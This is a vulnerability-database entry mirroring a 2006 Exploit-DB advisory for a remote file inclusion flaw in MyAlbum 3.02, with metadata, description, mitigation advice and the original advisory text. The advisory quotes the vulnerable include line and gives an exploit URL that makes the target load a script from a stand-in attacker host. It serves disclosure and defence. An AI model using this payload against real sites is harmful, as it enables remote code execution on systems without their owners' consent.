MyAlbum - exploit.company

vendor:

MyAlbum

by:

Silahsiz Kuvvetler The TURKISH DEVELOPER

8,8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: MyAlbum

Affected Version From: 3.02

Affected Version To: 3.02

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability

MyAlbum version 3.02 and possibly other versions are vulnerable to a remote file inclusion vulnerability. The vulnerability is due to the 'langs_dir' parameter in the language.inc.php script not being properly sanitized before being used in an include statement. This can be exploited to include arbitrary files from remote hosts resulting in arbitrary code execution on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct paths to files that are included in the application. Additionally, the application should be configured to use a restricted privilege account when accessing files.

Source

Exploit-DB raw data:

#==============================================================================================
#MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability
#===============================================================================================
#
#Critical Level : hm...i think...
#
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=1731
#
#Version : 3.XX (maybe others...)
#
#================================================================================================
#
#Bug in :
#
#./language.inc.php
#================================================================================================
#
#Vulnerable Code :
#
#
#         include($langs_dir."/messages.".$lang.".php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[MyAlbum_DIR]/language.inc.php?langs_dir=http://evilsite.com/evilscript.txt?
#
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler The TURKISH DEVELOPER
#
#Contact : co-type[at]hotmail[dot]com
#
#GreetZ : |FATTALGAZI!| - |MADWORM| - |NARCOTIC| - |MR.TROJAN| - |TILKIANDRE| - |EDORAS| - | XVCX |
#
#AND ALL STARHACK USERZZ...
#
#Special Thanqs : str0ke - 0xyGen
#
#Reklam Kokan Hareket :d ===>>>>>>>>>>>>>>>>>> WWW.STARHACK.ORG <<<<<<<<<<<<<<<<<<=======
#
#==================================================================================================

# milw0rm.com [2006-11-09]